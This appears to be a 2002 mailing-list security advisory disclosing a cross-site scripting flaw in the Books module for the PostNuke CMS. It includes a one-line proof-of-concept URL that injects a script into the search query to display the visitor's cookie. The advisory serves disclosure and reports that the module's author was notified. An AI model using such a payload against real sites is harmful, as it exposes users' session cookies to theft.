The Books Module for the PostNuke CMS XSS Vulnerability

Pistone Thu, 03 Oct 2002 20:16:54 -0700

- ----------------------------------------------------
Class :         input Validation Error


Risk :            Due to the simplicity of the attack and the number of sites
                   that run module books the risk is classified as Medium to  
                   High.

URL:             Http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64) 
This Books module version v0.6  is running as a Rogue (PN 0.7)
- ----------------------------------------------------

Exploit:
       
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>


- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org

The Books Module for the PostNuke CMS XSS Vulnerability

Reply via email to